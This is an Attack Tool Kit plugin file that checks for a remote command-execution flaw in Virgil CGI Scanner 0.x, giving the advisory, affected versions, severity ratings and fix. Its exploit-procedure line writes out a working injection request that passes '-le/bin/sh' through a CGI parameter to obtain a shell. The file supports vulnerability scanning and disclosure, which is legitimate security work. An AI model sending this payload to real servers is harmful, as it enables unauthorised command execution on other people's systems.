Virgil CGI Scanner 0.x command execution 2.0
 
Plugin ID: 37
Plugin name: Virgil CGI Scanner 0.x command execution
Plugin filename: Virgil CGI Scanner command execution.plugin
Plugin filesize: 2921 bytes
Plugin family: HTTP
Plugin created name: Marc Ruef
Plugin created email: marc dot ruef at computec dot ch
Plugin created web: http://www.computec.ch
Plugin created company: computec.ch
Plugin created date: 2003/11/14
Plugin updated name: Marc Ruef
Plugin updated email: marc dot ruef at computec dot ch
Plugin updated web: http://www.computec.ch
Plugin updated company: computec.ch
Plugin updated date: 2004/11/14
Plugin version: 2.0
Plugin changelog: Optimized the trigger pattern to be more accurate in version 1.3. Corrected the plugin structure and added the accuracy values in 1.4. Improved the pattern matching and introduced the plugin changelog in 2.0.
Plugin protocol: tcp
Plugin port: 80
Plugin procedure exploit: open|send GET /cgi-bin/virgil.cgi?tar=-le/bin/sh HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# 200 *
Plugin exploit accuracy: 99
Plugin comment: This plugin was written with the ATK Attack Editor.
Bug advisory: http://www.securityfocus.com/archive/1/296635
Bug affected: Virgil CGI Scanner 0.x up to 0.9
Bug not affected: Virgil CGI Scanner newer than 0.9
Bug vulnerability class: Configuration
Bug description: Virgil CGI Scanner is an open-source CGI scanner with web frontend. The software fails to sufficiently sanitize user-supplied input. By passing a malicious value to a CGI variable, it may be possible for a remote attacker to execute arbitrary system commands, with the privileges of the webserver process.
Bug solution: Upgrade to Virgil CGI Scanner 1.0 or use htaccess authentication for the scanning service.
Bug fixing time: 15 minutes
Bug exploit availability: Yes
Bug exploit url: http://www.securityfocus.com/bid/6031/exploit/
Bug remote: Yes
Bug local: Yes
Bug severity: High
Bug popularity: 5
Bug simplicity: 7
Bug impact: 8
Bug risk: 7
Source SecurityFocus BID: 6031
Source Secunia ID: 7368
Source Literature: Hacking Intern - Angriffe, Strategien, Abwehr, Marc Ruef, Marko Rogge, Uwe Velten and Wolfram Gieseke, November 1, 2002, Data Becker, Düsseldorf, ISBN 381582284X
Source Misc.: http://www.computec.ch

This file was generated by the Attack Tool Kit (ATK), the open-sourced security scanner and exploiting framework.